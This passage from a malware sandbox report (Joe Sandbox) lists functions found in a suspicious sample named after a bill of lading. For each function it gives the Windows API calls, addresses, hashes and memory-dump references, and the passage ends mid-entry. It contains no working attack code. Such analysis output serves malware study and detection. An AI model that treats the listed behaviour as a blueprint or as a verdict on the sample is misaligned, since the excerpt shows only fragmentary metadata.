                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2759813231-0
                                                                                                                      • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                      • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                                                                      • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                      • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                                                                      Function 0047721A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2169480361-0
                                                                                                                      • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                      • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                                                                      • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                      • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                                                                      Function 00448C8B Relevance: 6.1, APIs: 4, Instructions: 73windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32 ref: 00448CB8
                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                                                                      • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                                                                      • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 312131281-0
                                                                                                                      • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                      • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                                                                      • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                      • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                                                                      Function 004588B0 Relevance: 6.1, APIs: 4, Instructions: 67networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • select.WSOCK32 ref: 0045890A
                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                                                                      • accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastacceptselect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 385091864-0
                                                                                                                      • Opcode ID: 4f99be09ea3748399bcd45f1fb284b1e509608db9923cba0f0141099163bafeb
                                                                                                                      • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                                                                      • Opcode Fuzzy Hash: 4f99be09ea3748399bcd45f1fb284b1e509608db9923cba0f0141099163bafeb
                                                                                                                      • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                                                                      Function 00438D4E Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                      • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                                                                      • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                      • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                                                                      Function 0043362D Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00433695
                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1358664141-0
                                                                                                                      • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                      • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                                                                      • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                      • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                                                                      Function 0044419B Relevance: 6.1, APIs: 4, Instructions: 53synchronizationthreadwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2880819207-0
                                                                                                                      • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                      • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                                                                      • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                      • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                                                                      Function 0043401C Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00434037
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00434085
                                                                                                                      • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 357397906-0
                                                                                                                      • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                      • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                                                                      • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                      • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                                                                      Function 00424E33 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                      • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                      • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                                                                                                                      Function 00436A1D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __wsplitpath.LIBCMT ref: 00436A45
                                                                                                                        • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                      • __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                                      • __wcsicoll.LIBCMT ref: 00436A93
                                                                                                                      • __wcsicoll.LIBCMT ref: 00436AB0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1187119602-0
                                                                                                                      • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                                      • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                                                                      • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                                      • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                                                                      Function 00437AFE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1597257046-0
                                                                                                                      • Opcode ID: ef4c8eb1668fb764ac9879486c39433899b48e1b70f0ed706df85b8b39ec7f0c
                                                                                                                      • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                                                                      • Opcode Fuzzy Hash: ef4c8eb1668fb764ac9879486c39433899b48e1b70f0ed706df85b8b39ec7f0c
                                                                                                                      • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                                                                      Function 004555D6 Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteDestroyObject$IconWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3349847261-0
                                                                                                                      • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                      • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                                                                      • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                      • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                                                                      Function 0044B600 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2223660684-0
                                                                                                                      • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                      • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                                                                      • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                      • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                                                                      Function 00447268 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                        • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                        • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                        • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                        • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                      • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                                                                      • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                                                                      • EndPath.GDI32(?), ref: 004472B0
                                                                                                                      • StrokePath.GDI32(?), ref: 004472BE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2783949968-0
                                                                                                                      • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                      • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                                                                      • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                      • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                                                                      Function 00417D0E Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __getptd.LIBCMT ref: 00417D1A
                                                                                                                        • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                        • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                      • __getptd.LIBCMT ref: 00417D31
                                                                                                                      • __amsg_exit.LIBCMT ref: 00417D3F
                                                                                                                      • __lock.LIBCMT ref: 00417D4F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3521780317-0
                                                                                                                      • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                                                      • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                                                                                      • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                                                      • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                                                                                      Function 00471144 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDesktopWindow.USER32 ref: 00471144
